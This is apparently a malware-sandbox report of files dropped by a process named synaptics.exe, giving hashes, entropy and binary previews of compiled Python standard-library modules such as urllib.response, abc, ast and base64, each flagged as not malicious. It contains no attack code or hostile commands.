                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33800
                                                                                                                                                                                                            Entropy (8bit):5.440654581044471
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:PGx1qI5qcr97to4zfJA/G4B3qrmuZv0saN7erPd:+xNFSUCd7uZv0saN7er1
                                                                                                                                                                                                            MD5:D8706D0F895598BAF486A123253038BE
                                                                                                                                                                                                            SHA1:6A828A5998A56DF4E721B8F7E5D1F7B8C564D878
                                                                                                                                                                                                            SHA-256:D706717CFD8BF955F90C16EDC2A6918B233C34A89F27B0D3CEBF31E64A3F4248
                                                                                                                                                                                                            SHA-512:BC9A25F5EE2E66C952BA8A172AC1E770A22A2B06635E9031FF486F484F24B47BB2402D319C1A3CC4A998D2F04FB24372E6DA55446145D73CB295057954418E31
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.d.Z.g.d...Z.d.Z.i.Z.d.d...Z.d.Z.d.Z.d.d...Z.e.e.f.d.d...Z.e.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.d.d#l.m.Z...e.d$d%..Z.e.d&d'..Z e.d(d)..Z!d*e._.d+e.j"_.d,e.j#_.d-e _.d.e j$_.d/e j%_.d0e j&_.d1e j'_.d2e j#_.d3e!_.e j$j.e!j$_.e j%j.e!j%_.e j&j.e!j&_.d4e!j(_.e j'j.e!j'_.e j#j.e!j#_.e.Z)G.d5d$..d$e.e...Z*G.d6d&..d&e e...Z+G.d7d(..d(e!e...Z,G.d8d9..d9e.e...Z-G.d:d;..d;e e...Z.G.d<d=..d=e!e...Z/d>d?..Z0e0....[0d.dBdC..Z1dDdE..Z2d.dFdG..Z3dHdI..Z4d.dJdK..Z5dLdM..Z6dNdO..Z7d.dPdQ..Z8dRdS..Z9dTZ:d.a;dUdV..Z<e..=dW..Z>d.dZd[..Z?.\.]d.d^d_..Z@.\.]d.d`da..ZAd.dbdc..ZBeCdd..ZDeEeD..ZFi.ZGG.dedf..dfe.jH..ZId.dhdi..ZJd.djdk..ZKd.dldm..ZLd\d@d.d.eKf.dndo..ZMdpdq..ZNdrds..ZOdtdu..ZPdvdw..ZQd.aRdxdy..ZSdzd{..ZTd.aUd|d}..ZVd~d...ZWd.d...ZXd.d...ZYd.d...ZZd.d...Z[d.a\d.d...Z]d.d.d...Z^d.d.d...Z_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):71362
                                                                                                                                                                                                            Entropy (8bit):5.431941705551869
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:fZcvBft5NLO4/8f5pda8QPz3lelAqIu/PeI4f3G6IKoi1xDFY2B:fWtt5U4UhpdIPzuHV6FHxjB
                                                                                                                                                                                                            MD5:B8EE3D8327BA05772B691B43C2F71172
                                                                                                                                                                                                            SHA1:EE2076BB6A1004B67F2B7C4C5F82DFDB5308993A
                                                                                                                                                                                                            SHA-256:550938BB2B88A6CE0D7AD1E34D47AAFF226B3242842FF85CA8DA30C71942A2A8
                                                                                                                                                                                                            SHA-512:D96EBE6314BE97FBB304CC31E2849EA02578B256AF6E40F6F4ABD0E01F604B42F690382176E35391ABE3696F0737C1E8D9938151D884D584B5972758CBA73160
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*m+Z+..z.d.d.l,Z,W.n...e-y.......d.Z.Y.n.w.d.Z.g.d...Z/d.e.j0d.d.......Z1d.a2d.e.j3f.d.d.d.d.d...d.d...Z4d.d...Z5g.Z6d.d.d...Z7d.d...Z8e..9d.e.j:..Z;d.d...Z<G.d.d...d...Z=G.d.d...d...Z>d.d...Z?G.d.d...d...Z@G.d.d ..d e@..ZAG.d!d"..d"e@..ZBG.d#d$..d$e@..ZCd%d&..ZDG.d'd(..d(e@..ZEG.d)d*..d*..ZFG.d+d,..d,eF..ZGG.d-d...d.eG..ZHG.d/d0..d0..ZIG.d1d2..d2eIe@..ZJG.d3d4..d4eIe@..ZKe.jLZMG.d5d6..d6..ZNG.d7d8..d8e@eN..ZOG.d9d:..d:e@eN..ZPG.d;d<..d<e@..ZQG.d=d>..d>eQ..ZReSe.jTd?....rtG.d@dA..dAeQ..ZUe/.VdA....G.dBdC..dCe@..ZWG.dDdE..dEe@..ZXdFdG..ZYdHdI..ZZG.dJdK..dKe@..Z[dLdM..Z\G.dNdO..dOe@..Z]G.dPdQ..dQe]..Z^G.dRdS..dSe@..Z_dTZ`e.jadUk...r.d.dVlbmcZcmdZd..n.dWdX..ZcdYdZ..Zdi.ZeG.d[d\..d\..ZfG.d]d^..d^ef..Zgd.ahd_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3491
                                                                                                                                                                                                            Entropy (8bit):4.755357860013178
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:1BaL9CzkpnMBDq/vnacKhRVH+nRsxv5C+8/15dzjT:CxunNq33ERVHNvCl/9T
                                                                                                                                                                                                            MD5:F41D5C39C1E32ADEE8724F68E395A0A1
                                                                                                                                                                                                            SHA1:10DC9642BCE1C9A62579DE0CB62E2E21FEFFBA57
                                                                                                                                                                                                            SHA-256:6E45D2089310D7E879AD7FB71B93BD56AC5897EDDB0CCEAB07F0729DB85F345D
                                                                                                                                                                                                            SHA-512:C2F9D4F013E259AAF3071BEF11189D1C453C8D5B667044BDCFC6E404E1E1C35C4C5C9F847074CD1E39F435B62E3EA1F4EEAC913F324D96405B42C91AA88F2ED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sZ...d.Z.d.d.l.Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).a....Response classes used by urllib...The base class, addbase, defines a minimal file-like interface,.including read() and readline(). The typical response object is an.addinfourl instance, which defines an info() method that returns.headers and a geturl() method that returns the url.......N)...addbase..addclosehook..addinfo..addinfourlc........................s8...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.).r....zOBase class for addinfo and addclosehook. Is a good idea for garbage collection.c........................s ...t.t.|...j.|.d.d.d.....|.|._.d.S.).Nz.<urllib response>F)...delete)...superr......__init__..fp)...selfr........__class__...>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\urllib\response.pyr........s........z.addbase.__init__c....................C...s....d.|.j.j.t.|...|.j.f...S.).Nz.<%s at %r whose fp = %r>).r......__nam
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4155
                                                                                                                                                                                                            Entropy (8bit):5.363203962388916
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CgdNzUuGd+P2sKNUW4om2j8kQAnPPELBG0uY:P4BRR4om1gPG00uY
                                                                                                                                                                                                            MD5:0A0B165B9DD5C5D0B2888F0BDBD273D9
                                                                                                                                                                                                            SHA1:CCBC5C67F30C552A46CA3CB720B5DD931248FEBC
                                                                                                                                                                                                            SHA-256:1DF545690312E42B0DC45F0F3E2F374434DCFC98FD840690B79EDBE73823DA9F
                                                                                                                                                                                                            SHA-512:49277F7717B7CCE7B51D53AEACE10BB0FC274112B3F127F0A9380FE8CE3DDA4BB39A3AD0772D61165E6B7F2AA10BE2D97DDB8B4DEC2EFC075E6E084A8BF5716F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).an...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32949
                                                                                                                                                                                                            Entropy (8bit):5.03585044523216
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ppDQ8l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:7pl+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                                            MD5:AD0EECFDD929A4BA0C3E09BD13A0476D
                                                                                                                                                                                                            SHA1:62C41945CF7C9109FB0DE3D24099C4953863823C
                                                                                                                                                                                                            SHA-256:071D93FE7FA1433D5D44F827775D3B2CD665C7C4AF12360D405ED2CF9E9419DD
                                                                                                                                                                                                            SHA-512:7D354F88C8091681CB13DAA090479F0C247D0482E7ED6BA6A5292E88EF0EC129D214130D8F44E310A12558C19B7CF982C25592BE63EC9C8242D779BC5B67D038
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5896
                                                                                                                                                                                                            Entropy (8bit):5.809212082993532
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:nPgbBl/+DrxavOvdW7KPSbM1Ybqc77ve6AVQWW8Mo20CaLXwQ55KL7KEQ:P9DVzTEM1O5GTvvXUL2EQ
                                                                                                                                                                                                            MD5:57F006A3ABD18454DA74271A31132214
                                                                                                                                                                                                            SHA1:A7E65DBB964315D550284D4FE77E5E730C536443
                                                                                                                                                                                                            SHA-256:0F37D849D3A352CBD0B7D1FF6ED7748334A726371863C2F2C4CB486BA227442F
                                                                                                                                                                                                            SHA-512:D63A0572EC3650E90C75B65B31569BDD642C05580A0CBE7039BAEE4F467B602BA7CEFD187832B0E5BE8E62B82096B8AD315F19DD4A9CD5A7C27EC35E6E2D11A0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d(#.......................@...s$...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..i.d"d#..d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC....dDdEdFdGdHdId2dJdK....Z.i.dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`da..dbdc..ddde..dfdg..dhdi..djdk..dldm..i.dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....Z.d.Z.z.e...W.n...e.y.......Y.n.w.e.d.7.Z.e.D.].Z.d.e.f.e.d.e.f.<.q.d.Z.e.D.].Z.d.e.f.e.d.e.f.<...q.e.d.d...e.....D.....Z.e.e...e.e...k...s#J...e.d.d...e.....D.....Z.e.e...e.e...k...s9J...e...d.d.d.d.d9dDdDd.d.d.d2d.d.d.......e...d.d2d.d4d.d.......e...dUd.dcd.d.......e...dNd.d.d.d.d.d.d.d.d.d.d.d.d.......d.Z.e.D.].Z.d.e.d.e.f.<...qxd.Z.e.D.].Z.d.e.d.e.f.<...q.d.S.)...__builtin__..builtinsZ.copy_reg..copyreg..Queue..queueZ.SocketServerZ.socketserverZ.ConfigParserZ.configparser..repr..reprlibZ.tkFileDialog..tkint
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4536
                                                                                                                                                                                                            Entropy (8bit):5.144636090704415
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:xnAZIr5Xc+SHmtPK4Q9XEf9j0K5ULIPmwPu7gKxNW4q4RqOJd0f:xNxByEeIOQCxNWQRqOT0f
                                                                                                                                                                                                            MD5:85E7C6A0B41AA79A3A4A93BA5DAD610C
                                                                                                                                                                                                            SHA1:156521E3B73C1773712B108BEA008781F7E80074
                                                                                                                                                                                                            SHA-256:800C98EAF06299F9E2EFD8CADA4D3982ABC35E392006A3E47190AC34BB13D132
                                                                                                                                                                                                            SHA-512:DF17489809BF82CB9AE8FFA260B46FAC124400AF1044AD115593C0A1868C53CDC0A0E164AD00BDAA635B2B7FC3BB067F93405AA5D52AEA516749455DB9784CF7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sB...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.).z7Internal classes used by the gzip, lzma and bz2 modules.....Nc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BaseStreamz.Mode-checking helper functions.c....................C...s....|.j.r.t.d.....d.S.).Nz.I/O operation on closed file)...closed..ValueError....self..r.....;C:\Users\user\AppData\Local\xFSOj9El1Q\lib\_compression.py.._check_not_closed....s..........z.BaseStream._check_not_closedc....................C........|.....s.t...d.....d.S.).Nz.File not open for reading)...readable..io..UnsupportedOperationr....r....r....r......_check_can_read...............z.BaseStream._check_can_readc....................C...r....).Nz.File not open for writing)...writabler....r....r....r....r....r......_check_can_write....r....z.BaseStream._check_can_writec....................C...s(...|.....s.t...d.....|.....s.t...d.....d.S.).Nz3Seeking is only suppor
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3571
                                                                                                                                                                                                            Entropy (8bit):5.08001624286678
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CsOn3Ch9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:Cs8Cfcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                                            MD5:08F7A7928E4EE51E73B227283FCBD2A6
                                                                                                                                                                                                            SHA1:7FCD2466913B9415174F9887137698AFE2B190D1
                                                                                                                                                                                                            SHA-256:E03B556F52E4969A134328B6B7B2682724E59AC581CDFFCFD3560FBC9BB8821D
                                                                                                                                                                                                            SHA-512:69F837EE8B7DFE71B9D1F37BBBFD342A0FD10C1BD29B6C15E23D36D6F00911D6318DE8EEAE2993D087DDA8CF739AD499F65181F98083B6973F68A30675C1ACD0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r.....<C:\Users\user\AppData\Local\xFSOj9El1Q\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prompt objec
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7632
                                                                                                                                                                                                            Entropy (8bit):4.613900755667279
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:no0AmOjav3ze0qLnKFHWpLiEEskjXoNizml+Ws2w13TvqcJlnqJEqBTgztqetKHs:o0Abj236LTKF2pLiE3kjXoEzml+Ws2wV
                                                                                                                                                                                                            MD5:128562100C3C9CCB9A7354181B639061
                                                                                                                                                                                                            SHA1:E3707FDB3A84E42EC30193E3D4884C50B241A510
                                                                                                                                                                                                            SHA-256:E4B9B4E31273BCD556E7F26A87D565C35A110B4C314992E7D5DCDA4DB6FDE510
                                                                                                                                                                                                            SHA-512:93DADB9BCF97D9B7061993404B26895C9D4546B14FCD4BC215EE75A9DE056A9D33169CB8BB11167C00D61FF47911823DB0EC0614FC8C7B89AA14366665B4706A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s>...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d...Z.G.d.d...d...Z.d.S.)..........ref)...GenericAlias..WeakSetc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._IterationGuardc....................C...s....t.|...|._.d.S...N).r......weakcontainer)...selfr......r.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\_weakrefset.py..__init__....s......z._IterationGuard.__init__c....................C...s ...|.....}.|.d.u.r.|.j...|.....|.S.r....).r......_iterating..add).r......wr....r....r......__enter__....s............z._IterationGuard.__enter__c....................C...s8...|.....}.|.d.u.r.|.j.}.|...|.....|.s.|.......d.S.d.S.d.S.r....).r....r......remove.._commit_removals).r......e..t..br......sr....r....r......__exit__....s....................z._IterationGuard.__exit__N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s&...e.Z.d.Z.d@d.d...Z.d.d...Z.d.d...Z.d.d...Z
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6775
                                                                                                                                                                                                            Entropy (8bit):5.127887113090687
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Jc2+dPAp6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:m2+dP1MGxYtag2VXLk5ewc
                                                                                                                                                                                                            MD5:2A61EA4FF0003F9487D2E6AC9F6C7924
                                                                                                                                                                                                            SHA1:35D69A830E44C11599EE9E61034B08DE37A52D4D
                                                                                                                                                                                                            SHA-256:12F7C7A896FCC8B90F20B325601F7F03FD72035CBC02431C9BF96D85DFCCC06D
                                                                                                                                                                                                            SHA-512:64D5D1B960B1C5D0539EAC7F32E136F092545BA073A067D43D810ABF9FA84786D48D17BBC82ED451F12A37C08D4477FED07E96A80FD5DFC2E5913D5D0A3AD8A9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....2C:\Users\user\AppData\Local\xFSOj9El1Q\lib
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):55763
                                                                                                                                                                                                            Entropy (8bit):5.2786121481233685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:a4tQGlgD7U5M0gB2ze0GIHimylhWNbflS8rHKMAsSbUgUU0/9eKQddNhvDqIUy7w:a4+GlgD7U54B2XNHehW7uVvuIlPgj
                                                                                                                                                                                                            MD5:EC106ABC857B05EF274E8244F201EBE6
                                                                                                                                                                                                            SHA1:2220B6EF5A8095397BF92018CBA5E4D3864D714C
                                                                                                                                                                                                            SHA-256:E1EC0371A54EFC8B39257EE1BCF2EED9F8D3564CCD843234D781E7AE2C5B4B87
                                                                                                                                                                                                            SHA-512:F7D45635B497DE0DA8F80A52C5C6230B8E57A407CE30D5C26662FD9B1F5725E20F1597CD5F963CAC2F919C423D5475376588062D5BB0AD8DB08496B6BD2A6594
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d`d.d.d...d.d...Z.d.d...Z.dad.d...d.d...Z.d.d...Z.d.d...Z.dbd.d...Z.d.d...Z.d.d...Z.dcd.d...Z.d.d ..Z.d!d"..Z.d.d#..d$d%..Z.d&d'..Z.G.d(d)..d)e...Z.G.d*d+..d+e...Z.e.e.d,..s.d-d...Z.d/d0..Z.e.e.e...e._.e.e.e...e._.G.d1d2..d2e ..Z!d3d4..Z"G.d5d6..d6e.e!d7..Z#G.d8d9..d9e.e!d7..Z$G.d:d;..d;e.e!d7..Z%G.d<d=..d=e.e!d7..Z&G.d>d?..d?e.e!d7..Z'e#e(e)e*f.e$e+f.e%e,f.e&e d...e-f.e'e d@..f.i.Z.e#e-f.i.Z/e-d=e d...d=e(d6e)d6e*d6e+d9e,d;e d@..d?i.Z0G.dAdB..dBe1..Z2G.dCdD..dDe2..Z3G.dEdF..dFe2..Z4e.e5dG....s"dHdI..Z6dJdK..Z7e.e6e7..e5_8G.dLdM..dMe9..Z:G.dNdO..dOe;..Z<G.dPdQ..dQe;..Z=G.dRdS..dSe;..Z>dTe?e.j@jAd.......ZBG.dUdV..dVe...ZCdWZDdXZEg.eD..eE..R.ZFG.dYdZ..dZe...ZGd[d\..ZHd]d^..ZIeJd_k...ryeI....d.S.d.S.)daH.... ast. ~~~.. The `ast` module helps Python applications to process trees of the Python. abstract syntax grammar. The abstract syntax itself might change with. each Python re
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17186
                                                                                                                                                                                                            Entropy (8bit):5.496639246898952
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:1ZvQ11ayn9wBqXY71hITEOtuAk8CUSSYkXJ20RQa83hg9M6o0RzuQcT/zlNaf63V:Xgay9wgo71hITOtHYP9M70xuzRNi63V3
                                                                                                                                                                                                            MD5:926C8F516423723E4FB6E8C6A5B968C4
                                                                                                                                                                                                            SHA1:5F32927A380B1D84BA92AD123C4BD76AB144812A
                                                                                                                                                                                                            SHA-256:4F1665814F3C5D7160753B856E753D8286B8F658B91F9B18FDA7D03377C07885
                                                                                                                                                                                                            SHA-512:007D447B024EE0B82406F951879CC005453D4A98E27E3EEC7516A15ABF2F5995175B393551C05B1F86E9961AECC275FFBB685B1E566B3ECE9E066AD3DDED9AAA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.S.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.e.e.f.Z.d.d...Z.dQd.d...Z.dRd.d...Z.d.d...Z.d.d...Z.e...d.d...Z.e...d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.a.i.a.d.d...Z.dSd.d...Z.d.d...Z.e.j.d d!..e._.dSd"d#..Z.e.j.d e.d$..e._.d%d&..Z.e.j.d'd!..e._.dTd(d)..Z.e.j.d'd*d$..e._.d+d,..Z dTd-d...Z!d.a"d.a#d/Z$d0Z%dUd1d2..Z&d.d.d.d.d3..d4d5..Z'd.d.d6d7..d8d9..Z(d:Z)d.a*d.a+d.a,dTd;d<..Z-d=d>..Z.d?Z/e/d@..dA..Z0dBdC..Z1dDdE..Z2dFdG..Z3dHdI..Z4dJdK..Z5dLdM..Z6dNdO..Z7e8dPk.r.e6....d.S.d.S.)VzDBase16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings.....N)...encode..decode..encodebytes..decodebytes..b64encode..b64decode..b32encode..b32decode..b32hexencode..b32hexdecode..b16encode..b16decode..b85encode..b85decode..a85encode..a85decode..standard_b64encode..standard_b64decode..urlsafe_b64encode..urlsafe_b64decodec....................C...sl...t.|.t...r.z.|...d...W.S...t.y.......t.d.....w.t.|.t...r.|.S.z.t.|.......W.S...t.y5......t.d.|.j.j.....d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2612
                                                                                                                                                                                                            Entropy (8bit):5.223716360147751
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lqChwHaPJ7Bn7V3wiCEOCl7VU3OpOBn7B3wCLnCRl7VC39eV:sCh7Bx3wlEOC03OpOB93wGCRi34V
                                                                                                                                                                                                            MD5:A6D5EE7D36A2E1BA05744A57FA33023E
